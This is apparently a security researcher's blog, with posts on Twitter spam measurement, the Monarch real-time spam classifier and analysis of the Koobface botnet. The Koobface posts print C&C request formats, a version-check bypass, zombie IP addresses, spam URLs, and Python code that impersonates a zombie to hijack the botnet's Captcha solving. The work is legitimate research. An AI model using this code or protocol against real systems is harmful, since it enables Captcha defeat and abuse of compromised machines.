Working @Twitter & Researching 4 Facebook

June 15th, 2011 — 7:15am

After a bit of juggling and finishing up research at Berkeley for the Spring (fingers crossed for IMC 2011), I landed an internship at Twitter over the Summer. My goal is to examine spam that is targeting their systems and to see whether any of the research ideas coming out of our Berkeley group are transferable. Plus, I get sweet sweet access to data.

Also, to my surprise, I won a fellowship from Facebook to continue performing security research into social networks (starting next Fall). The meat of my proposal includes understanding malicious application usage, account abuse, and characterizing the monetization of social network spam. I’m delighted my proposal got some traction; now to just get the work done next year.

Comment » | Facebook, Life, Twitter

Monarch: Preventing Spam in Real-Time

June 15th, 2011 — 6:51am

(This post is based on research from Oakland 2011 – a PDF is available under my publications)

Recently we presented our research on Monarch, a real-time system that crawls URLs as they are submitted to web services and determines whether the URLs direct to spam. The system is geared towards environments such as email or social networks where messages are near-interactive and accessed within seconds after delivery.

The two major existing approaches for detecting and filtering spam are domain and IP blacklists for email and account-based heuristics in social networks that attempt to detect abusive user behavior. However, these approaches fail to protect web services. In particular, blacklists are too inaccurate and too slow to list new spam URLs. Similarly, account-based heuristics incur delays between a fraudulent account’s creation and its subsequent detection due to the need to build a history of (mis-)activity. Furthermore, heuristics that target automation fail to detect compromised accounts that exhibit a mixture of spam and benign behavior. Given these limitations, we seek to design a system that operates in real-time to limit the period users are exposed to spam content; provides fine-grained decisions that allow services to filter individual messages posted by users; and functions in a manner that generalizes to many forms of web services.

To do this, we develop a cloud-based system for crawling URLs in real-time that classifies whether a URL’s content, underlying hosting infrastructure, or page behavior exhibits spam properties. This decision can then be used by web services to either filter spam or as a signal for further analysis.

Design Goals

When we developed Monarch, we had six principles that influenced our architecture and approach:

  1. Real-time results. Social networks and email operate as near-interactive, real-time services. Thus, significant delays in filtering decisions degrade the protected service.
  2. Readily scalable to required throughput. We aim to provide viable classification for services such as Twitter that receive over 15 million URLs a day.
  3. Accurate decisions. We want the capability to emphasize low false positives in order to minimize mistaking non-spam URLs as spam.
  4. Fine-grained classification. The system should be capable of distinguishing spam hosted on public services from the non-spam content alongside it (i.e., classifying individual URLs rather than coarser-grained domain names).
  5. Tolerant to feature evolution. The arms-race nature of spam leads to ongoing innovation in spammers’ efforts to evade detection. Thus, we require the ability to easily retrain the classifier to adapt to new features.
  6. Context-independent classification. If possible, decisions should not hinge on features specific to a particular service, allowing use of the classifier for different types of web services.

Architecture

The architecture for Monarch consists of four components. First, messages from web services (tweets and emails in our prototype) are inserted into a dispatch Kestrel queue in a phase called URL Aggregation. These are then dequeued for Feature Collection, where a cluster of EC2 machines crawls each URL to fetch the HTML content, resolve all redirects, monitor all IP addresses contacted, and perform a number of host lookups and geolocation resolutions. We optimize feature collection with caching and whitelisting of popular benign content.

The collected features are stored in a database and later transformed into meaningful binary vectors during Feature Extraction. These vectors are then supplied to Classification. We obtain a labeled dataset from email spam traps as well as blacklists (our only means of obtaining a ground truth set of spam on Twitter). Using distributed logistic regression with L1-regularization, which we detail in the paper, we are able to reduce 50 million features down to the 100,000 most meaningful ones and build a model of spam in 45 minutes for 1 million samples. During live operation, we simply apply this model to the features of a URL. Overall, it takes roughly 6 seconds from insertion into the dispatch queue to a final decision on whether a URL is spam, with network delay accounting for the majority of the overhead.
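To make the extraction and classification stages concrete, here is a minimal sketch using scikit-learn; the hashing vectorizer, feature names, and toy data are my own stand-ins for illustration, not the distributed implementation described in the paper.

# A toy sketch of Feature Extraction and Classification, assuming
# scikit-learn; Monarch's real pipeline is distributed and operates
# on roughly 50 million features.
from sklearn.feature_extraction import FeatureHasher
from sklearn.linear_model import LogisticRegression

# Stand-ins for feature collection output: one dict of binary features
# per crawled URL (page content, redirects, hosting, DNS, geolocation).
collected = [
    {"dom:pharma": 1, "redirect:bit.ly": 1, "ip_asn:AS1": 1},  # spam
    {"dom:news": 1, "redirect:none": 1, "ip_asn:AS2": 1},      # benign
]
labels = [1, 0]

# Feature Extraction: hash sparse string features into fixed-width vectors.
hasher = FeatureHasher(n_features=2**20)
X = hasher.transform(collected)

# Classification: L1-regularization drives most weights to zero, mirroring
# the paper's reduction from 50 million features to the ~100,000 most useful.
clf = LogisticRegression(penalty="l1", solver="liblinear")
clf.fit(X, labels)

# Live operation: vectorize a new URL's features and apply the model.
print(clf.predict(hasher.transform([{"dom:pharma": 1, "redirect:bit.ly": 1}])))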

Results

  • Training on both email and tweets, we are able to generate a unified model that correctly classifies 91% of samples, with 0.87% false positives and 17.6% false negatives.
  • Throughput of the system is 638,000 URLs/day when running on 20 EC2 instances.
  • Decision time for a single URL is ~6 seconds.

One of the unexpected results is that Twitter spam appears to be independent of email spam, with different campaigns occurring in both services simultaneously. This suggests the actors targeting email have not yet modified their infrastructure to attack Twitter, though this may change over time.

Feedback

There remain a number of challenges in running a system like Monarch that are discussed in the paper as well as pointed out by other researchers.

  • Feature Evasion: Spammers can attempt to game the machine learning system. Given the real-time feedback for whether a URL is spam, they can modify their content or hosting to avoid detection.
  • Time-based Evasion: URLs are crawled immediately upon their submission to the dispatch queue. This creates a time-of-check, time-of-use challenge where spammers can present benign content upon sending an email/tweet, but then change the content to spam after the URL is cleared.
  • Crawler Evasion: Given that we operate on a limited IP space and use a single browser type, attackers can fingerprint both our hosting and our browser client. They can then redirect our crawlers to benign content, while sending legitimate visitors to hostile content.
  • Side effects: Not all websites adhere to the standard that GET requests should be free of side effects. In particular, our crawler may inadvertently trigger side effects when visiting subscribe and unsubscribe URLs as well as advertisements.

Other interesting questions remain to be answered. In particular, it would be useful to understand how accuracy evolves over time on a per-campaign basis. Some campaigns may last a long time, increasing our overall accuracy, while quickly churning campaigns that introduce new features may result in lower accuracy. Similarly, it would be useful to understand whether the features we identify appear in all campaigns (and are long-lasting), or whether we are able to quickly adapt to the introduction of new features and new campaigns.

Comment » | Twitter, Underground Economies

@spam: The underground on 140 characters or less

August 21st, 2010 — 2:20am

(This post is based on research to appear in CCS 2010 — an advance PDF is available under my publications)

To understand spam propagating within Twitter, we plugged into Twitter’s streaming API and monitored tweets submitted to the site over the course of one month. Given that we have no pre-existing notion of what spam ‘looks like’, we use three blacklists to flag URLs previously identified in email spam: Google Safebrowsing, URIBL, and Joewein. Because URLs may be shortened by services such as bit.ly or otherwise obfuscated, we crawl each URL until reaching the final landing page and use that domain to determine blacklist presence.
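As a rough sketch of that crawling step (my own illustration using the requests library, not our actual crawler, and ignoring JavaScript-driven redirects):

import requests
from urllib.parse import urlparse

def final_domain(url, timeout=10):
    # Follow all HTTP redirects to the landing page and return its domain,
    # which is then checked against Safebrowsing, URIBL, and Joewein.
    resp = requests.get(url, timeout=timeout, allow_redirects=True)
    return urlparse(resp.url).netloc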

During our monitoring we gathered over 200 million tweets from the stream and crawled 25 million URLs. Over 3 million tweets were identified as spam. Of the URLs crawled, 2 million were identified as spam by blacklists, 8% of all unique links. Of these blacklisted URLs, 5% were malware and phishing, while the remaining 95% directed users towards scams.

Spam Breakdown by Type

Twitter presents itself as an entirely different delivery mechanism from email, with a vastly different audience. For that reason, we analyzed the breakdown of spam on Twitter to understand which players are involved and how they correspond to spam directed at email. As shown in the figure below, many of the traditional email scams have found their way onto Twitter, but a new category has also appeared: scams promising an easy way to generate Twitter followers, largely directing users to phishing pages that steal Twitter credentials.

[Figure: breakdown of Twitter spam by category]

Abuse of Twitter Features

Given the limitation of 140 characters to attract a victim’s attention, Twitter scams have evolved to abuse Twitter’s core features such as @mentions, #hashtags, and RT @ retweets.

Callouts are mentions used to target specific users in order to infiltrate their feed and appear personalized. In our data set, roughly 10% of scams were advertised using personalized mentions, while only 3% of phishing/malware used the feature. An example would be: Win an iTouch AND a $150 Apple gift card @victim! http://spam.com

Retweet Hijacking is an attempt to abuse the credibility of other users to draw a wider audience or increase trust. Given a tweet from a trusted user such as @barackobama A great battle is ahead of us…, a spammer will prepend a link and retweet the original text: http://spam.com RT @barackobama A great battle is ahead of us…. Because modifying and retweeting is common practice, there is no simple mechanism to detect forgeries or malicious intent.

Retweet Purchasing relies on other trusted parties to retweet spam tweets. Services such as retweet.it purport to retweet a message 50 times to 2,500 Twitter followers for $5 or 300 times to 15,000 followers for $30. The accounts used to retweet are other Twitter members (or bots) who sign up for the retweet service, allowing their accounts to be used to generate traffic.

Trend Setting is an attempt to create a trending topic on Twitter by abusing hundreds of compromised/fake accounts all tweeting with the same #hashtag. We encountered a total of 12 different attempts to generate trends, using roughly 2,000 accounts each, all promising users more followers in exchange for their account credentials. Roughly 70% of all phishing tweets in our data set included a trend-setting #hashtag.

Trend Hijacking lets spammers ride on the success of currently trending topics, allowing spam tweets to be syndicated to the entire Twittersphere rather than a limited audience of followers. Of all the #hashtags we encountered in spam, roughly 86% were user-generated topics. An example would be Help donate to #haiti relief: http://spam.com.

How Successful is Twitter Spam?

Despite widespread abuse of Twitter by spammers, the current mechanisms in place to prevent spam are fairly limited. Twitter currently uses Google’s Safebrowsing API to block malicious links, while relying on account heuristics such as aggressive friending/unfriending and repeated tweets to detect spam behavior. Combined with a system designed for the dissemination of links and information, these limited defenses make Twitter an ideal propagation platform for spam.

To estimate Twitter clickthrough, we measure the ratio of clicks a link receives, as reported by bit.ly, to the number of tweets sent. Given the broadcast nature of tweeting, we measure reach as a function of both the total tweets sent t and the followers exposed to each tweet f, where reach = t × f. In the event multiple accounts with potentially variable numbers of followers all participate in tweeting a single URL, we measure total reach as the sum of each individual account’s reach. Averaging the ratio of clicks to reach for 245,000 bit.ly URLs, we find roughly 0.13% of spam tweets generate a visit, orders of magnitude higher than the clickthrough rates of 0.003-0.006% reported for spam email.
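As a toy worked example of this computation (the numbers are invented for illustration, not drawn from our dataset):

# Two accounts tweet the same spam URL; each account's reach is t * f.
accounts = [
    {"tweets": 3, "followers": 1200},   # reach: 3600
    {"tweets": 1, "followers": 450},    # reach: 450
]
total_reach = sum(a["tweets"] * a["followers"] for a in accounts)  # 4050

clicks = 5  # clicks reported by bit.ly for this URL
print("%.4f%%" % (100.0 * clicks / total_reach))  # 0.1235%, near our 0.13% average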

Twitter’s improved clickthrough rate compared to email has a number of explanations. First, users have only 140 characters on which to base their decision of whether a URL is spam. Paired with the implicit trust users place in accounts they befriend, the increased clickthrough potentially results from a mixture of naivety and lack of information. This result highlights the need for social networks to quickly adapt to spam threats, adopting controls similar to email’s, though within a real-time framework.

Comment » | Malware, Twitter, Underground Economies

Zion to California

July 1st, 2010 — 7:36am

Perhaps worthy of an update, I recently moved out to California to begin working for Dawn Song and Vern Paxson as a researcher at the University of California, Berkeley. If the cards have it, I hope to continue my Ph.D. work here. On the drive out I spent a few days in Zion camping and day hiking. Flickr describes the experience better than I can.

Comment » | Life

Koobface Spam

March 8th, 2010 — 2:28am

The Koobface botnet preys on social networking sites as its primary means of propagation. Unsuspecting victims browsing Facebook, Twitter, and other social networks are sent messages from users they believe to be friends. In truth, these users are either compromised accounts that fell for one of Koobface’s scams or fraudulent accounts created by Koobface. The messages sent by Koobface can be recovered by directly interacting with the Koobface C&C.

Spamming Modules

The Koobface botnet has unique spamming modules for a multitude of websites including Facebook, MySpace, Twitter, and Bebo. Despite this variety, the network-level behaviour of each module follows a generic template:

POST /.sys/?action=[module name]&v=[version]

At the current time, Koobface supports 6 modules with varying version numbers. Sending a request with an outdated version will result in a signal to update the module. This can be avoided by using &v=200 for every request (the version check is a simple less-than comparison); however, this is a noticeable deviation from typical zombie behaviour. A sketch of such a request follows the module list below.

fbgen | Facebook
twgen | Twitter
msgen | MySpace
begen | Bebo
tggen | ?
higen | hi5
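Polling a single module with the pinned version number might look like the following sketch; the C&C host, use of urllib, and function name are my own assumptions for illustration.

import urllib.request

def fetch_spam_template(cc_host, module="twgen"):
    # POST to a spamming module, pinning v=200 to bypass the version check.
    url = "http://%s/.sys/?action=%s&v=200" % (cc_host, module)
    return urllib.request.urlopen(url, data=b"").read()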

The responses from each POST are displayed below. Of the modules, only Facebook uses obfuscation. Each response contains a link to spam along with an associated message.

POST /.sys/?action=fbgen&v=101
#BLACKLABEL
#BLUELABEL
e3 14 a5 17 2d ec a0 4c 94 a3 e2 aa 6c 7e bd a6
2e 84 c1 1c ca d4 fa 55 aa 3b cc 4b 8f d8 f7 28
0f 5d e2 2e 3f b7 f5 30 b5 d8 eb 89 66 f8 89 49
f6 4e 5a e5 0e 7d c2 bd

 

POST /.sys/?action=twgen&v=08 

#BLACKLABEL
TEXT_M|OMFG!! You must see this video!! :))

http://www.stevesummerhill.com/index.html/

TEXT_W|OMFG!! You must see this video!! :))

http://www.stevesummerhill.com/index.html/

TEXT_S| http://www.stevesummerhill.com/index.html/
#CACHE MD5|51da895e24b09bc45f6b461a107407ee

 

POST /.sys/?action=msgen&v=26

#BLACKLABEL
SIMPLEMODE|1
FBTARGETPERPOST|15
TITLE_M|;)
TEXT_M|WOW
LINK_M|%3Ca%20href%3D%27http%3A//bit.ly/4NHlsT%27%3E
I olve wathcing you opsing anked!
TITLE_B|;)
TEXT_B|Cooooool Video http://bit.ly/4NHlsT
TEXT_C|Cool Video http://bit.ly/4NHlsT
#CACHE
MD5|f7fe75dc9a2fd0343bd62bdae9a709af

#SAVED 2010-01-22 16:11:36

Compromised Redirectors

Each spam message provided by Koobface contains a link to a compromised website acting as a redirector to Koobface malware. For redundancy, each website is embedded with a list of 20 zombies to forward visitors towards. Given that zombies have unpredictable uptime, the compromised redirector acts as a highly available intermediary, while zombies host the actual malware and social engineering attack.

Recovering the IP addresses of the zombies pointed to by a redirector is fairly simple, as they are stored in an only lightly obfuscated manner:

var b6e = [
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '0.213.31.133',
'24.235.' + '129.182',
'76' + '.249.244.80',
'98.' + '221.155.223',
'98' + '.208.114.221',
'173' + '.31.203.53',
'79.1' + '16.33.205',
'74.130.' + '134.165',
'88.165.' + '115.173',
'67.24' + '4.2.122',
'99.91' + '.48.26',
'95.' + '35.211.92',
'85.64' + '.111.111',
'173.18' + '.98.113',
'24' + '.99.82.56',
'65.9' + '6.238.254',
'173.' + '22.162.187',
'76' + '.31.51.190',
''];
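Pulling the addresses back out takes only a few lines of string handling; the snippet below is my own illustration, shown over the first few entries.

import re

snippet = """
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '0.213.31.133',
"""

ips = []
for line in snippet.strip().splitlines():
    # Strip the quotes, '+' operators, and whitespace, then the trailing comma.
    ip = re.sub(r"['+\s]", "", line).rstrip(",")
    if ip:
        ips.append(ip)

print(ips)  # ['86.126.205.43', '68.36.78.85', '190.213.31.133']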

Once one of the zombies is determined to be available, a victim is redirected to a scam page modelled after Facebook or YouTube.

Comment » | Facebook, Koobface, Twitter, Underground Economies

Hijacking Koobface’s Captcha Solver

March 8th, 2010 — 12:44am

One of the interesting challenges of propagating malware through social media is the requirement of obtaining new accounts for spamming. The Koobface botnet automates this process by leveraging zombies to sign up for accounts on Facebook, Gmail, Blogger, and Google Reader. Each of these services requires a solution to a Captcha challenge, which Koobface pushes off on a zombie machine’s owner to solve. During the course of infection, a Koobface zombie will repeatedly poll the C&C for Captchas requiring solutions, in turn prompting users with a threat to shut down unless the Captcha is solved. As any zombie can query the botnet for a Captcha solution, an adversary can re-purpose the botnet into a personal Captcha solver.

Initiating a Request

A Captcha request to the system can target either Google’s Captcha software or reCAPTCHA; in the case of Google, a flag &b=goo is appended to the request. As with most communication between a zombie and the Koobface C&C, this traffic occurs in plaintext over HTTP. Solving a Captcha is initiated by sending an HTTP POST to a Koobface C&C server. The POST includes the raw JPG data for the Captcha image to be solved, which will be displayed on a victim’s machine.

POST /.sys/?post=true&path=captcha&a=save[&b=goo]

The Koobface server will return a random identifier that is appended to future requests as a zombie repeatedly probes for a response:

POST /.sys/?post=true&path=captcha&a=query[&b=goo]&id=26076175

For each solution request, the server will respond with one of three states, directing the bot to its appropriate behaviour:

1 | Pending; repeat request at later time
3 | Solution available
0 | Abandon current request; no one has solved in maximum timeout
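A zombie’s polling loop around these three states might look like the sketch below; the exact wire format of the response, the helper name, and the use of urllib are my own assumptions.

import time
import urllib.request

def poll_solution(cc_host, captcha_id, is_google=False):
    # Probe the C&C until the Captcha is solved (3) or abandoned (0).
    flag = "&b=goo" if is_google else ""
    url = "http://%s/.sys/?post=true&path=captcha&a=query%s&id=%s" \
          % (cc_host, flag, captcha_id)
    while True:
        resp = urllib.request.urlopen(url, data=b"").read().decode()
        state = resp.strip().split("|")[0]  # assumes the state code leads the reply
        if state == "3":
            return resp   # solution available
        if state == "0":
            return None   # abandoned; no one solved within the maximum timeout
        time.sleep(30)    # state 1: pending, so retry later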

Solution Mechanism

Once a Captcha is injected, a separate zombie will randomly probe for a Captcha requiring a solution and submit a victim’s response to the C&C. The zombie also reports its version [&v=20] and the number of attempts it has made contacting the C&C for a Captcha [&i=0; i++ for each failed attempt].

# Request a Captcha ID requiring a solution.
GET /.sys/?action=captcha&a=get&i=0&v=20

# Request the image associated with a given ID
GET /.sys/?action=captcha&a=image&i=3&v=20&id=23063812

# Upload a response
GET /.sys/?action=captcha&a=put&id=23063812&v=20&code=valid%20text

Use of the goo flag when injecting a packet is necessary, as victims are prompted with different instructions depending on the type of Captcha being solved. Given the wrong flag, a valid solution won’t be accepted due to a regular expression mismatch; Google has only one word in its Captchas, while reCAPTCHA uses two words.

Enter both words below, separated by a space.|
       ([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
Enter the word below.|
       ([a-zA-Z0-9\$\.\,\/]+)
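Checking a candidate solution against these expressions shows why the wrong flag causes a rejection (a small illustration of my own):

import re

RECAPTCHA = r"([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)"

print(bool(re.fullmatch(RECAPTCHA, "two words")))  # True: two words accepted
print(bool(re.fullmatch(RECAPTCHA, "oneword")))    # False: one-word solution rejected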

Python Implementation

import logging
import random
import re
import socket

# CC_DOMAINS (a list of known Koobface C&C hosts) and fetch_image()
# (which returns the raw JPG bytes of the Captcha to solve) are assumed
# to be defined elsewhere.

def send_packet(domain, packet):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((domain, 80))
        s.send(packet)
        resp = s.recv(1024)
        s.close()
        return resp
    except (socket.error, socket.herror, socket.gaierror, socket.timeout):
        logging.error("Failed to query socket")
        return None

def captcha_query():

    # Select a random C&C domain from the list of Koobface hosts
    domain = random.choice(CC_DOMAINS)
    domain = re.sub(r'(http://)?(www\.)?', '', domain)

    # Fetch a Captcha image to be solved
    data = fetch_image()
    length = len(data)

    # Mimic Koobface's zombie behavior, down to its User-Agent string
    packet = "POST /.sys/?post=true&path=captcha&a=save&b=goo HTTP/1.0\r\n" + \
             "accept-encoding: text/html, text/plain\r\nConnection: close\r\n" + \
             "Host: %s\r\nUser-Agent: Mozilla/5.01 " % (domain) + \
             "(Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) " + \
             "Gecko/20050104 Firefox/3.0.2\r\n" + \
             "Content-Type: binary/octet-stream\r\n" + \
             "Content-Length: %s\r\n\r\n" % (length)
    packet = str(packet) + str(data)

    # Send the packet using a raw socket and return the C&C's response
    return send_packet(domain, packet)

Comments Off | Koobface

Sand and Dust

July 9th, 2008 — 4:50am

Researching at Sandia National Labs for the summer, though my projects have more to do with coding than with novel insight. It’s been a strange summer, but exceedingly fun. I adhered to my non-binding commitment to get as much camping and hiking in as possible while in New Mexico, with trips landing me at El Malpais, Bandelier, El Morro, Durango, and, fingers crossed, Carlsbad. New and old friends have kept me entertained during my summer stint away from home, but I’m looking forward to classes back at Champaign-Urbana. With Embedded System Design, Advanced Applied Cryptography, Communication Networks, and Operating Systems, I should find enough work along with research to make the semester worthwhile.

As always, Flickr has photos from recent excursions, and maybe even some pictures of people. I also updated the Library with recent reads, with other updates to follow.

Comment » | Hiking, Life

Where In Life Is Life Going?

January 9th, 2008 — 4:49am

This semester I was hoping to start some interesting courses, but Cyberspace Law, Communication Networks, and Advanced Applied Cryptography were all canceled. With my schedule turned on its head, I decided to take Random Processes, Fault-Tolerant Hardware Design, and, on a whim, Advances in Psychobiology. Despite the course load and research, I’ve found myself with a load of free time, which is being directed towards new hobbies (and duties):

  • Outdoor Illini: After getting back from snowshoeing the White Mountains, I decided to finally put some effort into starting a backpacking and camping group on campus called the Outdoor Illini. Hopefully the group will gain some traction — the whole point is to find other backpackers interested in leaving UIUC every few weekends and finding a park to explore. Bitter cold, snow, and rain are making the prospect of leaving UIUC this winter unlikely.
  • SORF Board: I decided to fill an open seat on the SORF Board. Every other Thursday I get to spend 5+ hours reading applications at a blurring speed in an attempt to determine which activities the campus should fund. Serving on the board is interesting; running for re-election is not.
  • Home Brewing: Bar hopping on campus is only so entertaining until it becomes customary. To break the monotony, some compatriots and I have taken to home brewing our own beer. It’s interesting to bring up home brewing to other people; inevitably someone in the group chimes in with “oh, I used to do that too.” Why didn’t they share this with me earlier?
  • Photography: In tandem with hiking and camping more often, I’ve taken up photography again. I’m trying to motivate myself to buy a new SLR camera, but its price tag and size are currently a deterrent. Despite those two factors, there’s no doubting that the pictures that come out of an SLR put my current camera to shame.

As always, Flickr has photos from recent explorations. I believe that’s enough effort in updating this would-be website.

Comment » | Life

Sunset on Western Sunsets

August 7th, 2007 — 4:52am

Ending my summer stint in Albuquerque, NM. Some useful research came out of the experience, but it was more worthwhile for the people and the area. Though Albuquerque may be the slowest of cities to live in, the natural scenery is a major draw to return some day.

I added some photos to Flickr from hiking trips into the Sandia mountains and into the lava parks of El Malpais.

Time to be heading back to _flat_ Illinois and picking up graduate studies. Courses this semester include abstract algebra, advanced probability and statistics, computer security, and a security seminar. With the added ‘bonus’ of research, life should be fairly busy. Too bad the mountains won’t be right outside to escape into.

Comment » | Life

Winding Away, Winding …

April 17th, 2007 — 4:55am

Finishing up the rest of the year of my undergraduate degree. Some interesting courses, but mostly this semester was just a 6-month break. Looking forward to the summer and doing some real work in security rather than just playing around.

After that, 4-5 more years of courses. Funny how things repeat themselves.

Comment » | Life
